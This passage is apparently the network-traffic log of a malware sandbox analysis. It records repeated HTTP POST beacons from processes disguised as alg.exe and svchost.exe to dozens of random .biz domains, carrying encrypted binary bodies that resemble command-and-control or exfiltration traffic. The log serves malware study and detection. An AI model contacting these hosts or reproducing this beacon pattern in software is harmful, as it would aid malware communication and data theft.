                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=a49248caf519acf7da02fe108742f703|8.46.123.33|1728394178|1728394178|0|1|0; path=/; domain=.ywffr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
131 | 192.168.2.4 | 50173 | 54.244.188.177 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:37.747864962 CEST | 347 | OUT | POST /scdrs HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: rynmcq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:29:38.497769117 CEST | 408 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=633edb470f550ddaacab05a02ead4208|8.46.123.33|1728394178|1728394178|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
132 | 192.168.2.4 | 50174 | 54.244.188.177 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:38.284884930 CEST | 351 | OUT | POST /yefflviaj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: ecxbwt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:29:39.019829035 CEST | 408 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=7bf9cbbd42b25c1f475f6b6f53114980|8.46.123.33|1728394178|1728394178|0|1|0; path=/; domain=.ecxbwt.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
133 | 192.168.2.4 | 50176 | 3.254.94.185 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:38.950469971 CEST | 350 | OUT | POST /flkouthsl HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: uaafd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 8, 2024 15:29:39.688638926 CEST | 407 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=3326eb2e443edd68b8f4374e7230ca57|8.46.123.33|1728394179|1728394179|0|1|0; path=/; domain=.uaafd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
134 | 192.168.2.4 | 50177 | 44.213.104.86 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:39.050441027 CEST | 356 | OUT | POST /pavcpmnglvwlhxt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pectx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 786
Oct 8, 2024 15:29:39.516978979 CEST | 407 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ff4aeaff3e9544127923e2747ba4b45a|8.46.123.33|1728394179|1728394179|0|1|0; path=/; domain=.pectx.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
135 | 192.168.2.4 | 50178 | 18.208.156.248 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:39.615616083 CEST | 349 | OUT | POST /oedtv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: zyiexezl.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 786
Oct 8, 2024 15:29:40.052479982 CEST | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:40 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d200ff9587dae26559d1a9369374e9ac|8.46.123.33|1728394180|1728394180|0|1|0; path=/; domain=.zyiexezl.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
136 | 192.168.2.4 | 50179 | 18.141.10.107 | 80 | 2912 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:40.027127981 CEST | 355 | OUT | POST /ifmlpkcljjt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: eufxebus.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 8, 2024 15:29:40.027148008 CEST | 778 | OUT | Data Raw: 17 cd ff 5d 98 54 87 a8 fe 02 00 00 45 c3 7e 12 74 48 4d 12 62 46 04 e2 d8 fa 29 65 44 1d f4 03 42 93 41 20 81 f8 fc 29 0d cc 13 53 f5 07 8f c9 60 d2 49 dc 67 56 c5 91 d6 04 d8 44 98 d8 bc ba 1d 1a 50 54 15 73 aa 69 33 d0 e8 a9 19 c2 6c c5 d7 d5
Oct 8, 2024 15:29:41.381036043 CEST | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:41 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ba3f64e15547d914cf7fdac7a3ce3eb8|8.46.123.33|1728394181|1728394181|0|1|0; path=/; domain=.eufxebus.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
137 | 192.168.2.4 | 50180 | 44.221.84.105 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:40.099745035 CEST | 354 | OUT | POST /guxaecyjiiwu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: banwyw.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 786
Oct 8, 2024 15:29:40.099756002 CEST | 786 | OUT | Data Raw: 2c 96 0b 84 c1 80 90 69 06 03 00 00 9e 5e 78 32 33 0d 78 34 98 1c 25 fd 05 01 d9 80 6c 40 1e f6 e0 e3 da 8d 53 f8 fe de a1 96 92 eb ae dd 6a 94 d2 fc a8 e2 a8 7f 80 30 64 b6 f5 4f 18 5f 85 2b a2 5a ff 12 30 ef cd ca 57 00 e9 00 65 eb 8b 7f 36 f1
Oct 8, 2024 15:29:40.587872982 CEST | 408 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:40 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ec6965203523b05088857c8c2a174420|8.46.123.33|1728394180|1728394180|0|1|0; path=/; domain=.banwyw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
138 | 192.168.2.4 | 50182 | 72.52.178.23 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:40.668971062 CEST | 347 | OUT | POST /noy HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: wxgzshna.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 786
Oct 8, 2024 15:29:40.668987989 CEST | 786 | OUT | Data Raw: 2c c8 3a 87 68 5e db b2 06 03 00 00 d6 50 2c c1 90 3b 0a cf 05 8d 5e 8d 16 61 bf 7c a6 92 5e 0d 9a e8 b3 d8 97 33 51 25 21 18 cd cd d6 9b 58 83 8f 39 d4 f4 e6 cc c0 42 00 7f 3f b7 a0 5c c1 46 5f cf 7e 97 22 56 de a4 85 81 55 5c 4d b1 b9 a4 b7 57


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
139 | 192.168.2.4 | 50183 | 72.52.178.23 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:41.204447985 CEST | 347 | OUT | POST /ghy HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: wxgzshna.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 786
Oct 8, 2024 15:29:41.204468012 CEST | 786 | OUT | [binary request body]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
140 | 192.168.2.4 | 50184 | 34.246.200.160 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:41.534482956 CEST | 352 | OUT | POST /fxeavmrosc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pwlqfu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 8, 2024 15:29:41.534482956 CEST | 778 | OUT | [binary request body]
Oct 8, 2024 15:29:42.294289112 CEST | 408 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:42 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=bffbdebd195b849e59d10d9f3f09e56b|8.46.123.33|1728394182|1728394182|0|1|0; path=/; domain=.pwlqfu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
141 | 192.168.2.4 | 50185 | 44.221.84.105 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:41.791023016 CEST | 347 | OUT | POST /hlcxi HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: zrlssa.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 786
Oct 8, 2024 15:29:41.791167021 CEST | 786 | OUT | [binary request body]
Oct 8, 2024 15:29:42.267083883 CEST | 408 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:42 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=7106c483357271d0e2a918f66a95b3ef|8.46.123.33|1728394182|1728394182|0|1|0; path=/; domain=.zrlssa.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
142 | 192.168.2.4 | 50186 | 18.141.10.107 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:42.294493914 CEST | 347 | OUT | POST /og HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jlqltsjvh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 786
Oct 8, 2024 15:29:42.294522047 CEST | 786 | OUT | [binary request body]
Oct 8, 2024 15:29:43.871831894 CEST | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:29:43 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=860eb39625ca1eadbb70fae07970cb4a|8.46.123.33|1728394183|1728394183|0|1|0; path=/; domain=.jlqltsjvh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
143 | 192.168.2.4 | 50188 | 47.129.31.212 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:42.864852905 CEST | 359 | OUT | POST /ohyfmaqfmywges HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: rrqafepng.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:29:42.864913940 CEST | 778 | OUT | Data Raw: f2 b3 b8 7b a7 f6 04 9a fe 02 00 00 8f 1a 7e b2 75 66 a6 9e 26 cf 09 0b 3b 95 89 e9 33 e6 d2 bb 6b ca 32 fe ed d2 d5 0f 71 fd 60 2b 90 f4 77 02 28 a7 79 8e d9 36 c1 ce 37 ca dc 6d 8e 87 59 ff b0 00 a6 59 40 39 ef 9f 18 0c 2f a2 52 70 b3 43 05 ee
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: {~uf&;3k2q`+w(y67mYY@9/RpC-+Z,&&_HH29~kWIBZ1ur4A{Ll#ri?17<%L^B;ssN/1PJ:m^J@-EE
Oct 8, 2024 15:29:44.190599918 CEST | 411 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=6618638685f77b0b2ee66ed0b03714b8|8.46.123.33|1728394183|1728394183|0|1|0; path=/; domain=.rrqafepng.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
144 | 192.168.2.4 | 50189 | 18.208.156.248 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:43.895834923 CEST | 353 | OUT | POST /mavqlvnkyqsv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: xyrgy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:29:43.895854950 CEST | 786 | OUT | Data Raw: e4 5d d3 04 26 50 12 40 06 03 00 00 d3 7c 13 df bb d1 d4 15 e1 06 ad 36 b5 49 35 8c 56 67 42 89 64 b7 8d 9e d7 e7 a2 29 bb 5e df f3 8e 28 00 97 e9 1f bb 4b e3 33 41 46 8f f5 0a 9f 27 6c 99 bb 1e da d1 53 07 d9 13 d3 da ba e2 f6 ae 42 c3 b5 19 d1
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ]&P@|6I5VgBd)^(K3AF'lSBg$pJ9'v6XDUK3eG'{QWGeSsPKoBb8P?;d|qU-E,o.M:Cie2M|4.2+Huvp6C
Oct 8, 2024 15:29:44.365669012 CEST | 407 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=0b5e7fa99caa442c2d0584d651c38bb3|8.46.123.33|1728394184|1728394184|0|1|0; path=/; domain=.xyrgy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
145 | 192.168.2.4 | 50190 | 172.234.222.143 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:44.386077881 CEST | 356 | OUT | POST /qewfnkeilkg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: htwqzczce.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:29:44.386102915 CEST | 786 | OUT | Data Raw: d5 52 4d 76 5d 70 13 09 06 03 00 00 b0 15 2c de 98 13 0e f1 1a f0 c1 b1 46 97 d8 7c cb a2 4b e0 f3 8c d1 43 2b f1 b8 13 ec 63 09 c7 f1 81 d2 a7 22 62 0e c2 1c 5c 25 e8 6f 75 54 41 59 7b e5 51 f6 0d e0 02 e8 47 16 cf ff 37 81 ad 4e 17 a0 9e 5f 30
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: RMv]p,F|KC+c"b\%ouTAY{QG7N_0Dn3ZA,0QYa8l1V8/T]_j~iaWR<10+h;A}ByQYIce_ahwP2A-:FiYq.."mv|wsy


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
146 | 192.168.2.4 | 50191 | 172.234.222.143 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:44.905728102 CEST | 361 | OUT | POST /rnkfruqdkxfgjfwn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: htwqzczce.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:29:44.905783892 CEST | 786 | OUT | Data Raw: 4f f3 23 2c 71 f8 12 a7 06 03 00 00 ed fb 63 21 6f d2 a2 a7 81 e1 34 cd 4b b0 eb d4 3d 38 03 68 70 a9 53 45 d2 e7 56 6d cc 0b ec 79 77 d0 f0 9e 6f 69 68 2a 8f 20 76 ad e0 21 e2 95 86 76 34 1a c1 7c 1a 7b 23 2b 04 67 7f 44 bf a7 27 00 57 d1 63 6b
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: O#,qc!o4K=8hpSEVmywoih* v!v4|{#+gD'Wck}%P}Km<2]!Cq5MbPH>bCEP\<'l7*C_gu1=4ptJ.lRT%PdL)e+U<Ixv@


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
147 | 192.168.2.4 | 50193 | 3.94.10.34 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:29:45.110486031 CEST | 349 | OUT | POST /yxaoh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: ctdtgwag.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:29:45.110486031 CEST | 778 | OUT | Data Raw: f1 85 67 52 87 f7 ab f4 fe 02 00 00 8a b8 52 5e 17 3a fb 20 6c b0 65 b1 a9 49 30 e6 b1 f4 f6 01 e4 ff df 41 20 e4 65 60 7a a6 a5 c1 90 b5 50 7e 10 a1 de a5 44 f7 21 37 d3 5a e6 13 5b 8c 70 c4 86 8b ec 84 bc b4 22 1b 68 e5 2e 8a e4 3e fa fc 1e 92
